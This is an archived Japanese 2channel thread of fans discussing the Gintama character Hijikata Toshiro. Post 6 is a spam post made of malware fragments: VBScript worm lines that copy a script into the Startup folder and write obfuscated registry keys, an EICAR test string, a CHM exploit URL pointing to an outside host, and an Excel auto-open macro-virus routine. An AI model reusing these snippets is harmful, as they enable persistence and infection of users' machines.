5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【愛の戦士】銀魂の土方十四郎を語ろうマヨ5【マヨラ13】

1 :名無しかわいいよ名無し:2006/12/15(金) 00:40:50 ID:b3owbsnt
銀魂の鬼副長ことマヨラーこと瞳孔開き気味こと土方十四郎について
思う存分、熱くエロく語り合うスレです。

・sage進行でのんびりマターリ語ろう。
・荒らしは切腹。
・カプ話と判断したらスルー、スルーできない人も荒らしです。
・ジャンプ発売日までネタバレ禁止。
・アニメ感想は見れない地域の方の為に程々にね。
・次スレは980が立てる事。


前スレ【味の】銀魂の土方十四郎を語ろうマヨ4【IT革命や】
http://comic6.2ch.net/test/read.cgi/cchara/1158155213/

3代目スレ【自動】銀魂の土方十四郎を語ろうマヨ3【ドア】
http://comic6.2ch.net/test/read.cgi/cchara/1152169402/

2代目スレ【銀魂】鬼副長こと土方十四郎を語るスレ2【マヨたん】
http://comic6.2ch.net/test/read.cgi/cchara/1146588946/

初代スレ【銀魂の土方を語ろうマヨ。】
http://comic6.2ch.net/test/read.cgi/cchara/1115880608/

2 :名無しかわいいよ名無し:2006/12/15(金) 00:57:21 ID:IjK5xhkp
>>1

V-W-Vyー・~

3 :名無しかわいいよ名無し:2006/12/15(金) 01:24:24 ID:/EM73YVx
>>1さん乙!

4 :名無しかわいいよ名無し:2006/12/15(金) 05:19:27 ID:K7aLrKHv
>>1マヨ乙

5 :名無しかわいいよ名無し:2006/12/15(金) 05:23:20 ID:+7i2oksx
>>1
乙マヨー

「お茶漬け土方スペシャル、食うか?」って言った時
もし食べるって答えたら、食べさしてくれるのかなぁ(´Д`;)ハァハァ

6 :<body onload=window()>:2006/12/15(金) 06:19:43 ID:dqcQDuQS
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???????

7 :名無しかわいいよ名無し:2006/12/15(金) 07:06:24 ID:2DvdoVZv
>>1乙!
つお茶漬け土方スペシャル

8 :名無しかわいいよ名無し:2006/12/15(金) 16:32:38 ID:K3BnCMlb
>>1乙マヨ!!

>>5
それは新たに作ってくれるのか、食べていたものを差し出されるのかww
何かキモくてすまん


9 :名無しかわいいよ名無し:2006/12/15(金) 16:42:08 ID:K7aLrKHv
>>8
あいだをとって土方が「はい、アーン」してくれるっていうのは駄目ですか?

10 :名無しかわいいよ名無し:2006/12/15(金) 16:46:29 ID:2UsL2H/V
>>10なら本誌に土方kr

11 :名無しかわいいよ名無し:2006/12/16(土) 00:58:46 ID:k+ejLtiN
正座してお辞儀するのがなんか新鮮で萌えた

12 :名無しかわいいよ名無し:2006/12/16(土) 01:05:23 ID:US0DJdiV
あんなにガツガツ食べてるのに全然減らない土方スペシャル…
不思議だw
でも土方に薦められたら食べるしかない……

13 :名無しかわいいよ名無し:2006/12/16(土) 01:50:41 ID:0YvndjQP
アヌメで栗子に逆ナンされたときの慌てた顔に激萌えぇぇ
野郎かわいすぎるよハァハァ

14 :名無しかわいいよ名無し:2006/12/16(土) 02:07:40 ID:2dhPpOxe
マヨラ13は最高だね
中井さんの声も良くなったみたいだし

15 :名無しかわいいよ名無し:2006/12/16(土) 08:15:23 ID:kTNoGBGH
>>13
そこすっげー萌えたw
グラサンずり落ちてたよねw
驚いてひっくり返った声もテラカワユス(´д`*)ハァハァ
愛なんて…の切ない声にもキュンキュンしたw

16 :名無しかわいいよ名無し:2006/12/16(土) 09:20:06 ID:q+d6VusV
>>15
一字一句全て同意

そこのシーンでいつもの五割増し萌えた
土方カワユス

17 :名無しかわいいよ名無し:2006/12/16(土) 14:23:51 ID:X5UkwQPL
土方は純粋でカワイイ

18 :名無しかわいいよ名無し:2006/12/16(土) 16:59:26 ID:UICsSeW5
土方は素晴らしい

19 :名無しかわいいよ名無し:2006/12/16(土) 18:52:01 ID:BSXS6X8D
土方は可愛すぎる

20 :名無しかわいいよ名無し:2006/12/16(土) 18:59:49 ID:gTfxZgNh
着流し土方はエロカワイイ

21 :名無しかわいいよ名無し:2006/12/16(土) 20:13:48 ID:jZntPNYj
ベスト姿土方はエロカコイイ

22 :名無しかわいいよ名無し:2006/12/17(日) 00:36:31 ID:nkLkKT+/
自分はマヨラの「じゃーね」の声に激しく萌えた……
ハァハァハァ

23 :名無しかわいいよ名無し:2006/12/17(日) 04:28:01 ID:T+yOYFq9
こないだのアニメはやばかった
萌えすぎた

24 :名無しかわいいよ名無し:2006/12/17(日) 10:06:33 ID:UQhyOmHF
じゃーね??(゚Д゚ )
そんなのあったの???
早くアニメ見たい…('A`)

25 :名無しかわいいよ名無し:2006/12/17(日) 16:29:46 ID:1Q1lxajg
マヨ茶漬け見た時の、芸者さん達の悲鳴凄いw
あんな叫ばんでもいいのにw
最後の栗子のアレもあったし、土方女性不信になっちゃうよw

26 :名無しかわいいよ名無し:2006/12/17(日) 17:00:37 ID:1QiQI7zh
栗子は松平に聞いてマヨラ13の正体が真選組の副長だと知り、親父に頼んで無理やりデートすることに成功する
            ↓
土方も上司の命令で逆らえず、再びマヨラ13になることに

ダメだ。どうすればもう一度マヨラ13になってもらえる展開になるのかわかんね
多分、あれが最初で最後か


しかし、いい年こいて愛の戦士なんて言ってる土方はんはかわいいどすえ

27 :名無しかわいいよ名無し:2006/12/18(月) 00:02:29 ID:KbJk8EVR
こないだのアニメはやばかったな。
エロかわいすぎだコノヤロォォォ!!
なんか自分の中のS心が騒ぐというか、苛めたいというか・・・
ウズウズする。

28 :名無しかわいいよ名無し:2006/12/18(月) 01:31:08 ID:ToYniM4b
マヨラ13再来キボン

29 :名無しかわいいよ名無し:2006/12/18(月) 02:00:34 ID:yL5HlWyY
自分みたいに本誌or単行本で、マヨラ13を見て土方に転んだ人もいるだろうね
さすが愛の戦士というのは伊達じゃないな

30 :名無しかわいいよ名無し:2006/12/18(月) 13:31:17 ID:5LLLytwT
愛に臆病な愛の戦士…それがマヨラ13
土方ってなんかほっとけないオーラを放ってる

31 :名無しかわいいよ名無し:2006/12/18(月) 16:02:41 ID:ZG+cOAaU
>>30
なんかわかるよ!
ちょっかいかけたくなる(^ω^)

32 :名無しかわいいよ名無し:2006/12/18(月) 17:41:00 ID:Drn0tTIC
今週最後のコマにでてたの土方?

33 :名無しかわいいよ名無し:2006/12/18(月) 17:47:10 ID:yL5HlWyY
>>32
あれは自信ない…
そうかもしれないし、違うかもしれない

34 :名無しかわいいよ名無し:2006/12/18(月) 20:16:13 ID:dz8YRvfc
>>26
それってどこの「銀時vs土方」?


35 :名無しかわいいよ名無し:2006/12/19(火) 05:14:41 ID:x/Xylris
>>34
そんな展開、ゲームにあるの?

36 :名無しかわいいよ名無し:2006/12/19(火) 08:32:50 ID:j4nFFxEQ
>>35
あるよ。詳しくはゲーム板で「マヨラ13」で検索するアル

37 :名無しかわいいよ名無し:2006/12/19(火) 19:45:09 ID:x/Xylris
>>36
ありがとうマヨ

38 :名無しかわいいよ名無し:2006/12/19(火) 20:36:00 ID:N42ABbDT
この間のマヨラ13の回で妹がいきなり土方萌えになった
次の日、銀魂全巻揃えてた
マヨラ13ってすごいな

39 :名無しかわいいよ名無し:2006/12/19(火) 21:23:14 ID:EuUlZmoG
>>38
マヨラ13すげぇw
愛の戦士どころかハート泥棒だなw

40 :名無しかわいいよ名無し:2006/12/20(水) 00:04:45 ID:9yTj2OrT
土方ルートでゲームやってたらどんどん土方に惚れてきた。

時々見せる優しさがイイ!

41 :名無しかわいいよ名無し:2006/12/20(水) 00:16:34 ID:AlIym/P+
>>40
例えばどんな?一つでいいから教えてほしいな…

原作同様、女、子供に優しいとか面倒見がいいとか?

42 :名無しかわいいよ名無し:2006/12/20(水) 00:41:23 ID:9yTj2OrT
>>41
銀さんが敵を追っていなくなってしまって、落ち込む神楽を元気づけるようなシーンがあった。

一言だったけど、その言葉が凄く優しいなと思った。どんな台詞かちょっと忘れちゃったけどorz

43 :名無しかわいいよ名無し:2006/12/20(水) 00:43:46 ID:Nvhqq3vI
自分は滅んだ星の天人に掛ける言葉に優しさを感じた

44 :名無しかわいいよ名無し:2006/12/20(水) 00:59:53 ID:AlIym/P+
>>42
もしかして、この台詞?

土方「あのバカがそう簡単に殺られるわけないだろ。安心しろあいつを倒すのは俺だけだ」
神楽「お前もバカあるな」
土方「かもな」

dクス。この台詞がどこで使われたか気になってたんだよ〜
原作でもこれくらい仲良くなって欲しいな

>>43
何だか自分も買いたくなってきちゃったよw

45 :名無しかわいいよ名無し:2006/12/20(水) 01:16:36 ID:VXLzxod1
神楽がサド丸か何かと戦ってた時、
「お前に何かあったら万事屋にどんな顔すればいいんだよ…」みたいな事も言ってたよ。
子供に直に優しんだな土方って

46 :名無しかわいいよ名無し:2006/12/20(水) 01:57:07 ID:fcKJ83uh
でもたぶん神楽は土方より強い件

47 :名無しかわいいよ名無し:2006/12/20(水) 02:05:35 ID:AlIym/P+
>>46
多分っていうか100%そうだろうねw
でも、子供ならば自分より強い相手にも優しい土方にむしろ萌えます

48 :名無しかわいいよ名無し:2006/12/20(水) 03:03:24 ID:Kj8i0nE0
AAスレで貰ってきたw


          ''"""/フ::::::::::::"::::::::'::::::レi:ヽ,-‐‐,,,
         /::::::: ":::::::::::::::::::::::::::::::::::::::::: ==-丶
        ,,/:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\、
       ,, _フ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::i-ゝ
     /:::::::::://:::::::::::::::::::l:::::::::::::::::ヽヽヾ::::::::::::::'ヽ_
    //7,:,::::://::::l::::::::::::::::::/:::::::::::::::::::::ヽヽヾ::::::::::::ヾ__
    / / /l::://::::l::::::::::::::::::/:::::::::::::::::::::::::::ヽヽヾ::::::::::__ヽ
   '  l lノ::::l/:::::l::::::::::::::::/l:::::::::::::::::::::::::::::::::::::::::::::::::::\ヽ
     ):::::::::::::::l:::::::::::::::/:l::::::::::::::::::::::::::::::::::i ヽ、:::::::::::l
     //1,1::::::::::::::::::::i1::::i11:/ヽ:::::lヽ::::l::::::l  T::::::::::ヽ
     l/ l::l l:::::::::::::::::::::::::::::l:ヽ/ レ │ Y ヽ:::l  ノヽ::::::ヽ
     '  i::l ヽl i:::::::::::::::::::::l ,,レ__iイ     \l ノ'ヾヾヽl
       レ ヽi" _,,:::::::::::l レ K┴''       l ヽi l ヽヘ
         レ ヽヽ1'ヽ::i v ' '       ,l  l /;;;;;;;;\
            ヽヽヽi          /'  /;;;;;;;;;;;/ヘ
                l  ,       /'  /;;;;;;;;;;/ /;;\
               ヽ-ヽ___     /' /;;;;;;;;;;;//;;;;;;;;;;;ヽ
                  丶-、  /' /;;;;;;;;;;//_;;;;;;;;;;;;;;;;;ヽ
                     "-Y ,/;;;;;;;;;;//_/ヽ;;;;;;;;;;;;;;;;;;\
                    /;;lヘヽ;;;;;;;;;/// /""'ヽ-___,;;;;;;;;丶
                   K;;;;/-ヽヽ。// / /l'""";;;;;;;;;;ヽ;;;;;;;;ヽ
                   ヽヽ//ヘヽ/ / //;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽ;;;;;;l
                    lヽl l  l l´V//l;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽ;;;;i
                   /;;l l  l l;;;;;;;;;;;;;;;;i;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽ;;i
                  /;;;;l l //,=、;;;;;;;;;i;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽi
                  /;;;;-=l l /==-";;;;;;;;;;;i;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;Y
                 /;;;└=l レl;;;;;;;;;;;;;;;;;;;;;;i;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l
                 /;;;;;;;;;/l /l___,,;;;;;;;;;;;;;;;;;;i;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l
                l;;;;;;;-=l l i=='/;;;;;;;;;;;;;;;;;;i;;;;;;;;;;;;;;;;;;;;;;;;;;;___,,,,,,__,l_,
                ,l;;;;;;/="/l l--";;;;;;;;;;;;;;;;;;;;;;;ヽ;;;;;;;;;;;;;;;,_/;;;;;;;;;;;;;;;;;7
               /;;;;;;;;;// l l;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽ;;;;;;;;;/;";;;;;;;;;;;;;;;;;/_
              /;;;;;;;;;//  l l==,-';;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽ;;/;;;;;;;;;;;;;;;;;;;;;;;;ヽ_
            /;;;;;;/==/   l l=="';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l,,
           /;;;;;;;;;;;;7/    l l;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽ,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l_
         /;;;;;;;ヘ//    l l___,,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽ
       /;;;;;;;;;;"=' '/    //=-";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l
      /;;;;__,,;;/_/      //""'';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l
    /;;;;;;;く=/"       //___,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;/



49 :名無しかわいいよ名無し:2006/12/20(水) 07:59:02 ID:c+z+V2oE
なんか歪んでるゥッ!?

50 :名無しかわいいよ名無し:2006/12/20(水) 14:01:38 ID:8ESA11ul
ゲームは色んな土方が見られてすごく満足(原作とは違うかもだけど)

ところで土方って自分の容姿を自覚してたんだ?
女性相手に桂の聞き込みをしてる時に
「その人イケメンだったりします?」
「俺ほどじゃねぇ」「じゃあ違います」
なんてあってちょっと可笑しかったw

51 :名無しかわいいよ名無し:2006/12/20(水) 14:44:32 ID:RN+U4j7b
ゲームで土方受けスレが祭りな件

52 :名無しかわいいよ名無し:2006/12/20(水) 14:59:31 ID:c+z+V2oE
送っていくから家に帰ろう な。>51

53 :名無しかわいいよ名無し:2006/12/20(水) 18:48:36 ID:Cn2q3Ydo
そろそろジャンプで土方に会いたい
マヨあげるから出てきて

54 :名無しかわいいよ名無し:2006/12/20(水) 19:25:55 ID:D5Ukl6Gx
ゲーム、海老名さんを河童と勘違いしてるシーンで
「ばあちゃんが云々」といっていたw
小さい頃はおばあちゃんっ子だったのかしらと、ちょっと萌えた。

55 :名無しかわいいよ名無し:2006/12/21(木) 00:42:28 ID:jGIG9o3G
本家の土方さんちは河童から薬の製法を習ったそうだよ

56 :名無しかわいいよ名無し:2006/12/21(木) 01:04:24 ID:AYS42b38
>>53
なんだか…土方耐久レースに出されてるみたいだね…
この生き地獄を耐えないと土方に会えないんだ…
なんか蜃気楼が見えてきた

        / ,ィ / レ i V ∨ ,r   、  、丶  l丶  、 '-、_
       /l / / ´/ ,/ l /`l l /│\.l'、  ヽ ヾ 丶ヽヽ \  ̄
       ! レ   //     l l ´ l ,/'、 ,!   l l∨   ` \,l
      │    ´ ,       l′  レ  丶! ヽ  l.!   ト、   ヽ、_
        |/ ,   l  , ,       ,    l  ゙   l´, l ヽ、― '
      // /  l l   ll l  l  l  ',   l  '、   l | '   l
      i /  l l |  /|| l  l,  ll  |、  l',  | l |  ' l、  l
      / ! r' l l |',. l _i``ヽ、! ', l l.  | ',  l l l ',|   l lヽ |
          Y/ l l ',l ゙'!, ̄T_ラヽト.',,l', l ',./__,,|,|-‐lイ 、',│', '´ ̄ ̄ ` 、
         l  l, l、`  ` ―   `'! l !'"'-r‐ ッ― ! / l.!,r'
        丶 、',l′            l|  `ニ-‐' i il r'
            ! ` l  し           |       /.|/  化  目.  ・
            |rl |ヽ                   / !   .け  が  ・
        ,.リ'''|,!| ヽ        ` ´      /  l   .物  イ   ・
          /  `ー'、_ \    ‐ニ ニ-      / _l    か  っ  て
       /      `'‐、_、   ー--   , イ、__ \       て  め
      /           /゙|ヽ、     / l  `7', !       る  ェ
    __i|        ,' ,rl´ !  ` ― ' ´_  iヽ /  l l     ぞ
__ , - '  l l       / / l lY´ ̄`i´  `´', 〉 l l| ! l
    __l ヽ    / /   | ! !   !   l  ',lヽl l l | ヽ
ー'  ̄    ヽヽ (_)/ /    l | l    l    l  l ,! l l │  \
       ヽ '、 / /     l | ',   l i  ', l/ ! ', |` - 、 _ゝ,、   _ /
           ヽ /      l ', l   | l i  l l! ', 'iゝ ト- 、__ヽ_`,) ̄

57 :名無しかわいいよ名無し:2006/12/21(木) 07:05:58 ID:yJTjioTR
フルコースにマヨをかけて罠を仕掛けてみる。

58 :名無しかわいいよ名無し:2006/12/21(木) 12:57:19 ID:9h9jKw9v
ほうれん草にマヨかけたら美味かった
土方のお陰で野菜嫌いを克服できたよw
ありがと土方wマヨネーズは万能だな

59 :名無しかわいいよ名無し:2006/12/21(木) 18:43:55 ID:n/6G0zM4
お好み焼きにマヨって邪道なのかな?
自分物心ついたときからアホみたいにかけてる…

60 :名無しかわいいよ名無し:2006/12/21(木) 18:55:21 ID:t3pY+dAT
お好み焼きにマヨは王道じゃない?w自分アホみたいにかけるけど
もんじゃにもマヨ入れます

61 :名無しかわいいよ名無し:2006/12/21(木) 19:04:55 ID:z3V08KF3
来週やっとやっと本誌登場キタ─wwヘ√レvv~(゚∀゚)─wwヘ√レvv~─ !!!

62 :名無しかわいいよ名無し:2006/12/21(木) 19:05:58 ID:rSpFC6fh
↑ネタバレなのでバレスレに住み着かない人は見ないよう注意

63 :名無しかわいいよ名無し:2006/12/21(木) 19:08:43 ID:Bw9DmBNJ
ジャンプ氏んで。




http://tretre.fc2web.com/






64 :名無しかわいいよ名無し:2006/12/21(木) 19:08:53 ID:rSpFC6fh
被った・・・orz
でもむちゃくちゃカッコイイ
待ってたよ土方

65 :名無しかわいいよ名無し:2006/12/21(木) 20:13:00 ID:esMOUn49
ジャンプまでのお楽しみにしときたかったのにバカ

66 :名無しかわいいよ名無し:2006/12/21(木) 20:51:33 ID:Ewp2uilk
発売日まで禁止なのになに書いてんだコラ

67 :名無しかわいいよ名無し:2006/12/21(木) 20:59:29 ID:AYS42b38
まあまあ落ち着いて

つ旦 旦 旦

最近銀魂ハマった人も多いようだし、スレタイ見て次から気をつけよう

68 :名無しかわいいよ名無し:2006/12/21(木) 21:21:07 ID:uXKdD8dK
とりあえず月曜までみんなでwktkしとこう

69 :名無しかわいいよ名無し:2006/12/22(金) 00:03:53 ID:DB6EYb6d
ケータイ少年ジャンプで、土方の待ち受け更新されたね。
あの扉絵好きだから嬉しいw

70 :名無しかわいいよ名無し:2006/12/22(金) 16:04:33 ID:a6dNdgFi
>>69
見たwカッコイイよ土方w
でも、バックの桜がなくてちょっと悲しい
次は箸を口でパキッてやってるとこがいいな

71 :名無しかわいいよ名無し:2006/12/22(金) 19:07:43 ID:el+Y/6us
【銀魂】大手対決!一宮思帆VS本城塁【同人】
http://comic6.2ch.net/test/read.cgi/csaloon/1166781295/l50

72 :名無しかわいいよ名無し:2006/12/22(金) 21:03:06 ID:v9mHpZA2
>>71
巣にカエレ

73 :名無しかわいいよ名無し:2006/12/23(土) 20:56:12 ID:tDZpzDpN
土方に早く会いたいよ
土方はクリスマスはどうするのかな?独りでマヨケーキかな?

74 :名無しかわいいよ名無し:2006/12/23(土) 21:43:27 ID:Ecu/QYHe
元祖デブ屋で、マヨネーズでジェラードを作る!というのがあったな。
試食したところ「・・・丸っきりマヨネーズ」だったそうだ。
ケーキもおして知るべし。
それでも喰らうのが土方副長?


75 :名無しかわいいよ名無し:2006/12/24(日) 12:22:20 ID:zWgd/ekh
土方はクリスマスもお仕事っぽいな〜
働き者の土方にマヨケーキ作ってあげたいよ
そんでプレゼント交換したいよ

76 :名無しかわいいよ名無し:2006/12/24(日) 13:45:51 ID:/0Uk7b8R
オイィィィ、交換って、土方から何貰うつもりだァァァ




マヨライター欲しい

77 :名無しかわいいよ名無し:2006/12/24(日) 17:01:41 ID:ZMmA1wKN
>>48
スマソ、銀魂専用のAAスレってあるの?
ジャンプスレのことだろうか

78 :名無しかわいいよ名無し:2006/12/24(日) 17:20:38 ID:jRSN67CE
>>77
メロンにあるよ

79 :名無しかわいいよ名無し:2006/12/24(日) 18:18:24 ID:ZMmA1wKN
>78
ありがとう!

80 :名無しかわいいよ名無し:2006/12/25(月) 06:46:45 ID:LNsnCSZx
メリークリスマヨ!
今年のクリスマスプレゼントは、やっぱり土方の本誌再登場だよ

月曜になったから、ネタバレOKだよね
蹴ってる土方と、「あっ!!こっちに気づいた!!」と言われてるコマの土方(顔はわからないけど)と
「寒いから」と言ってる土方がめちゃくちゃツボで可愛かったよ〜

81 :名無しかわいいよ名無し:2006/12/25(月) 07:52:14 ID:5YncBshS
あれは本当は近藤と沖田が二人で楽しそうだったんで
ちょっと羨ましかったんだと思いました。
寂しがりやの土方マヨカワ

82 :名無しかわいいよ名無し:2006/12/25(月) 09:13:43 ID:iqYqCAly
すかした顔してしゃくってる土方がカワイスw
恥ずかしいのに猪木でごまかそうとしてる土方モエスwww

83 :名無しかわいいよ名無し:2006/12/25(月) 12:04:28 ID:T7KtVlnm
中島ミカとマヨいい友達になれそうだな
彼女もマヨが手放せずご飯やラーメン、
ケーキにもクリームと同じくらいマヨかけるそうだwwww

84 :名無しかわいいよ名無し:2006/12/25(月) 13:52:16 ID:31u6cj6s
マジでか!すごいな中島ww

85 :名無しかわいいよ名無し:2006/12/25(月) 14:12:31 ID:VI0vCtoa
ジャンプ読んだw
マフラーぐるぐる巻きの土方にキュンキュンしたw
近藤さんになんでここにいるんだって言われてるとこの顔が子供みたいでテラカワユスw
その後の寒いからもカワユスだよ(*´Д`)
年内に土方に会えて良かったw来週も出るみたいだし嬉しいよ

86 :名無しかわいいよ名無し:2006/12/25(月) 14:30:07 ID:ZEF4v6HD
寒いからの土方はまじで可愛かった…!
サンタさんありがとう。

87 :名無しかわいいよ名無し:2006/12/25(月) 15:25:40 ID:NUtQcYvW
>>81
何かイイね、そのフレーズ>マヨカワ
銀魂の土方はマヨカワイイ

88 :名無しかわいいよ名無し:2006/12/25(月) 15:43:34 ID:cT/SDibu
お風呂蹴り倒してる土方の自分だけ常識人っぷりが好きだ
「寒いから」は是非次のスレタイにお願いしたいくらい萌えた

89 :名無しかわいいよ名無し:2006/12/25(月) 16:56:35 ID:zWU9eTR+
寒いからにはやられたwマヨカワイイよw
自分もマヨたんと一緒にこたつ入りたいよ
みかん剥いてあげたいよ

90 :名無しかわいいよ名無し:2006/12/25(月) 17:11:12 ID:LNsnCSZx
「寒いから」が大人気で嬉しいw
あのシーンは間も含めて、何度見ても微笑ましいな
そういえば、赤マフラー持ってた事はあったけど、実際にマフラーしているところは今回が初なのかな?

>>85
次の号も引き続き登場してくれるけど、確か合併号で来週はお休みじゃなかったっけ?
間違ってたらごめん

91 :名無しかわいいよ名無し:2006/12/25(月) 17:46:47 ID:7C3qO4ah
次号は1月6日土曜日に発売。月曜が祝日だからかな。空知ゆっくり休め

あごしゃくらせてる土方可愛すぎる。照れちゃってシャイなあんちきしょうめがwwホントマヨカワイイ

92 :名無しかわいいよ名無し:2006/12/25(月) 18:33:05 ID:BiEAWI7X
近藤さんと沖田のお風呂シーン、期待してたのに
なんでマヨだけヌードじゃないの(`ω´*)

93 :名無しかわいいよ名無し:2006/12/25(月) 18:45:27 ID:LNsnCSZx
>>91
次は土曜発売か。d

>>92
サウナで見れたじゃないかw
ってか、あそこで近藤さんと沖田と一緒に風呂に入らない土方だから萌えるんジャマイカ
常識人ぶっといて、コタツにはちゃっかり入ってるマヨも可愛いな

94 :名無しかわいいよ名無し:2006/12/25(月) 19:09:23 ID:7C3qO4ah
マヨは寒がりなんかな。鼻とか頬とか寒さで赤くなってたら良いよ

95 :名無しかわいいよ名無し:2006/12/25(月) 21:11:42 ID:7NwIV/XV
マザコン疑惑が出てるぞ

96 :名無しかわいいよ名無し:2006/12/25(月) 21:23:41 ID:eAW1a0Xa
どこで?

97 :名無しかわいいよ名無し:2006/12/25(月) 22:04:32 ID:VI0vCtoa
>>94
寒がりっぽい
鼻の頭赤くして見回りしてたら可愛いw
そんでこたつで丸くなるんだよ

98 :名無しかわいいよ名無し:2006/12/26(火) 15:05:37 ID:qiHrYsrS
>>96 ニュータイプロマンスの中の銀魂の記事。
声優さんの間で言われてるだけだから公式の話ではない。

99 :名無しかわいいよ名無し:2006/12/26(火) 15:13:40 ID:/zRX0ozS
どこらへんがマザコンに見えるんだろ?謎だ〜

100 :名無しかわいいよ名無し:2006/12/26(火) 15:15:34 ID:pztwiY+O
100マヨ

101 :名無しかわいいよ名無し:2006/12/26(火) 16:14:15 ID:JisAfx1Y
母親出されたシーンもないのにマザコン疑惑ってw
副長が真選組のお母さんだとは思うけどさ

でもこれだけは言える
土方を好きになった女はマヨコンになる

102 :名無しかわいいよ名無し:2006/12/26(火) 18:26:42 ID:hjou+7C+
>>99
母性的なものに憧れてるっていうか飢えてるとこはありそう。
煙草吸ってみたりマヨ吸ってみたり口唇期固着っぽいとこあるし。

103 :名無しかわいいよ名無し:2006/12/26(火) 18:35:29 ID:Pgi0b2oi
そういえば胎内回帰願望があったね

104 :名無しかわいいよ名無し:2006/12/26(火) 19:23:44 ID:/zRX0ozS
>>102
それカワイイかも…
爪噛む癖もあったりするとか?カワイイー
なんか自分ヤバイかも
土方がやるなら何でも可愛く見えちゃうよ
もう病気だ

105 :名無しかわいいよ名無し:2006/12/26(火) 20:12:58 ID:+ajfi7p9
>>98
どんな経緯でそんな疑惑が出たのか気になるw

土方の家族構成知りたい
というかちゃんと家族いるのかな
近藤さんと出会ったときは放浪してたっぽいけど家出か?

106 :名無しかわいいよ名無し:2006/12/26(火) 20:24:59 ID:JisAfx1Y
何となく兄弟(兄とか姉)は生きてるけど、両親は他界しているってイメージだ

107 :名無しかわいいよ名無し:2006/12/26(火) 22:10:34 ID:6yvZeu0R
土方って坊っていう字にも見えるね。
隠語にしない?

108 :名無しかわいいよ名無し:2006/12/26(火) 23:51:17 ID:iXbTd5ek
もうなってる

最近初期に比べて各段に可愛くなってるな土方

109 :名無しかわいいよ名無し:2006/12/27(水) 13:50:22 ID:hkz78Wuf
初期はもっとギザギザハートな感じだったよね
狂犬っぽかった
今は野良猫かな?たまに出る土方のボケはものすごくかわゆいw

110 :名無しかわいいよ名無し:2006/12/27(水) 13:57:30 ID:g4QQZpIE
土方がやっていること全てに萌えを感じるんですけど。
土方かわいい(´□`*)萌

111 :名無しかわいいよ名無し:2006/12/27(水) 14:01:57 ID:wCBPH7v0
確かに初期は顔が幼かったけど、もっとギスギスしてたよね見るからに
今は何か隙だらけな気がする…w

ていうか、沖田に銃渡されて「あり?」と言ってる時とか
顔面に石ぶつけて血を流してたりとか可愛いシーンはチラホラあるにはあったけど
最新号の本誌に登場した土方はやばいくらいに可愛くなってる

何か今までアホな事してても、かっこいい感じに決めてたのに
「寒いから」とかはどう見てもかっこいいではなく、可愛いとしか形容出来なかったw

112 :名無しかわいいよ名無し:2006/12/27(水) 22:44:40 ID:E2d7qTGG
ちょっと幼さが垣間見えるね>寒いから

顎しゃくれはツボ。シャイ可愛い

113 :名無しかわいいよ名無し:2006/12/27(水) 23:14:20 ID:owtXOWhY
寒いから、という真正面からのマジレスっぷりがウケた。小学生の言訳のようだw

114 :名無しかわいいよ名無し:2006/12/27(水) 23:23:37 ID:7RaLqAeM
土方は基本的に生真面目で融通きかないタイプなんだよなー
だから訊かれたら素直に真っ正面から答えちゃう
まあそこが可愛いわけだがw

115 :名無しかわいいよ名無し:2006/12/27(水) 23:36:36 ID:wCBPH7v0
>>114
のわりには平気で嘘ついたりもするよね

エレベーターに挟まれたとか、キューピーちゃん見るだけで吐き気がするとか
このバレバレの嘘が逆に愛しいw
あの後、こっそり心の中でキューピーちゃんにごめんとか謝ってたりしてたらいいな

116 :名無しかわいいよ名無し:2006/12/27(水) 23:48:18 ID:UvC2N5bN
しゃくれることとか抵抗なくなってきつつあるね
照れてる言われても猪木までしてるし
こういうのにもう少し躊躇したり嫌がった感じの頃のが好きかも

